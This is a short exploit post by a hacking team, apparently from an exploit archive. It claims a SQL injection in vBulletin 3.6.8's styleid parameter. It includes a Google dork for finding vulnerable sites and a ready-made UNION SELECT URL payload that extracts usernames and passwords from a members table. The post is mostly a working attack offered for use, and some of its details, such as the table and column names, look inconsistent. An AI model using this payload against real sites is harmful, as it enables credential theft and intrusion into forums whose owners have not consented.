[D] vBulletin 3.6.8 Styleid SQL injection Vulnerabilities [z]
2010-12-23 12:41:41Inviato da: kedans
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah }-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# [D] vBulletin 3.6.8 Styleid SQL injection Vulnerabilities [z]
# Author : KedAns-Dz < Ked-H (at) Hotmail (dot) com
# Team : [D] HaCkErS-StreeT-Team [Z]
# + Allah Akbarr + Algerians HaCkErs
# Go0gle Dork : Powered by vBulletin - 3.6.8
:::::::::::::::::::::::::::::::::::::::::::::::::::(0x1a)::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# SQl injection --> index.php? style id=
:::::::::::::::::::::::::::::::::::::::::::::::::::(0x2a)::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# Bug Console = index.php?styleid= > + SQL Dz + <
# //--> + SQL Dz + --> :
http://[Server]/vb/index.php?styleid=27+and+1=0+union+select+1,concat(uname,passwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+members--
:::::::::::::::::::::::::::::::::::::::::::::::::::(0x3a)::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
# [D] HaCkerS-StreeT-Team [Z]
-- [>>] KedAns-Dz * BadR0 * XoreR * Dr.Ride * Fox-Dz * Red1One[<<] --
-- [>] IslamPard * NoR0 FouinY * Zaki.ENG * Hani NiN0 * MasSinh0u-Dz [<] --
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.